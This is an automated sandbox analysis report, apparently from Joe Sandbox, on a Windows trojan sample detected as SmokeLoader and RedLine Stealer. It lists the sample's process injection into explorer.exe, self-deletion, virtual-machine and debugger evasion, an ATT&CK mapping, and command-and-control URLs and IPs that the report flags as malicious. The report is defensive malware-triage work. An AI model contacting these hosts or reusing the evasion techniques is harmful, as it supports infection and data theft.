Source: 00000000.00000002.2253380086.0000000002C1D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: fbtdajh.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/2@7/2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02C200B4 CreateToolhelp32Snapshot,Module32First,

0_2_02C200B4

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\fbtdajh

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fbtdajh C:\Users\user\AppData\Roaming\fbtdajh

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	Section loaded: msvcr100.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cip:W;.cer:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\fbtdajh	Unpacked PE file: 4.2.fbtdajh.400000.0.unpack .text:ER;.rdata:R;.data:W;.cip:W;.cer:W;.rsrc:R; vs .text:EW;

Source: file.exe	Static PE information: section name: .cip
Source: file.exe	Static PE information: section name: .cer
Source: fbtdajh.2.dr	Static PE information: section name: .cip
Source: fbtdajh.2.dr	Static PE information: section name: .cer

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A2C1 push 686E5183h; ret	0_2_02C2A2D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A1CD push 686EA783h; ret	0_2_02C2A1FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A2D1 push 686E5683h; ret	0_2_02C2A2E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A2E1 push 686E5783h; ret	0_2_02C2A2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A2F1 push 686E5483h; ret	0_2_02C2A300
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A1FE push 686EA483h; ret	0_2_02C2A20C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A281 push 686E5D83h; ret	0_2_02C2A290
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A38D push 686E4283h; ret	0_2_02C2A39C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A1A5 push 686EA083h; ret	0_2_02C2A1CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C229AD pushfd ; iretd	0_2_02C229AE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C21EB0 push B63524ADh; retn 001Fh	0_2_02C21EE7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A2B1 push 686E5083h; ret	0_2_02C2A2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A261 push 686E5F83h; ret	0_2_02C2A270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A36D push 686E4C83h; ret	0_2_02C2A37C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A271 push 686E5C83h; ret	0_2_02C2A280
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A17D push 686EAD83h; ret	0_2_02C2A1A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A37D push 686E4D83h; ret	0_2_02C2A38C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A301 push 686E5583h; ret	0_2_02C2A310
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A20E push 686EA583h; ret	0_2_02C2A21C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C23B0D push esp; ret	0_2_02C23B0F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A311 push 686E4A83h; ret	0_2_02C2A320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A21E push 686E5A83h; ret	0_2_02C2A22C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A321 push 686E4B83h; ret	0_2_02C2A330
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A12B push 686EAE03h; ret	0_2_02C2A17C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C2A22D push 686E5883h; ret	0_2_02C2A244
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04791540 pushad ; ret	0_2_04791550
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_004014D9 pushad ; ret	4_2_004014E9
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_004031DB push eax; ret	4_2_004032AB
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_02C131AD pushfd ; iretd	4_2_02C131AE

Source: file.exe	Static PE information: section name: .text entropy: 7.5080418109409415
Source: fbtdajh.2.dr	Static PE information: section name: .text entropy: 7.5080418109409415

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\fbtdajh

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\fbtdajh

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\fbtdajh:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\file.exe	API/Special instruction interceptor: Address: 7FFDB442E814
Source: C:\Users\user\Desktop\file.exe	API/Special instruction interceptor: Address: 7FFDB442D584
Source: C:\Users\user\AppData\Roaming\fbtdajh	API/Special instruction interceptor: Address: 7FFDB442E814
Source: C:\Users\user\AppData\Roaming\fbtdajh	API/Special instruction interceptor: Address: 7FFDB442D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: fbtdajh, 00000004.00000002.2508869911.0000000002BFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: file.exe, 00000000.00000002.2253290608.0000000002C0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK9

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 437	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1219	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 800	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3688	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 879	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 872	Jump to behavior

Source: C:\Windows\explorer.exe TID: 2656	Thread sleep count: 437 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4156	Thread sleep count: 1219 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4156	Thread sleep time: -121900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2960	Thread sleep count: 800 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2960	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3476	Thread sleep count: 299 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3704	Thread sleep count: 320 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3704	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5676	Thread sleep count: 290 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4156	Thread sleep count: 3688 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4156	Thread sleep time: -368800s >= -30000s	Jump to behavior

Source: explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000002.00000000.2238006366.00000000097F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 00000002.00000000.2238006366.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: explorer.exe, 00000002.00000000.2237496899.0000000009605000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000002.00000000.2230566658.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2230566658.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: explorer.exe, 00000002.00000000.2237496899.000000000978C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000002.00000000.2238006366.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: explorer.exe, 00000002.00000000.2243162082.000000000C474000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: %me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
Source: explorer.exe, 00000002.00000000.2230566658.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000000.2230566658.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2238006366.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C1F991 push dword ptr fs:[00000030h]	0_2_02C1F991
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0479092B mov eax, dword ptr fs:[00000030h]	0_2_0479092B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04790D90 mov eax, dword ptr fs:[00000030h]	0_2_04790D90
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_02C10191 push dword ptr fs:[00000030h]	4_2_02C10191
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_02CF0D90 mov eax, dword ptr fs:[00000030h]	4_2_02CF0D90
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_02CF092B mov eax, dword ptr fs:[00000030h]	4_2_02CF092B

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: fbtdajh.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 125.7.253.10 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 211.171.233.129 80			Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe	Thread created: C:\Windows\explorer.exe EIP: F719A8			Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	Thread created: unknown EIP: 79F19A8			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fbtdajh	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000002.00000000.2230925016.00000000013A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, 00000002.00000000.2230925016.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2232347125.00000000048E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2230925016.00000000013A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2230566658.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: explorer.exe, 00000002.00000000.2230925016.00000000013A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2238006366.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004173E0 InterlockedExchangeAdd,ReadConsoleA,FindAtomW,GetConsoleFontSize,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,LoadLibraryA,InterlockedDecrement,

0_2_004173E0

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	511 Security Software Discovery	Remote Services	Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	42%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\fbtdajh	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\fbtdajh	42%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nwgrus.ru	125.7.253.10	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
http://unicea.ws/tmp/index.php	true	unknown
http://nwgrus.ru/tmp/index.php	true	unknown
http://tech-servers.in.net/tmp/index.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000000.2242095283.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/I	explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com-	explorer.exe, 00000002.00000000.2242095283.000000000C070000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://word.office.comM	explorer.exe, 00000002.00000000.2242095283.000000000C070000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
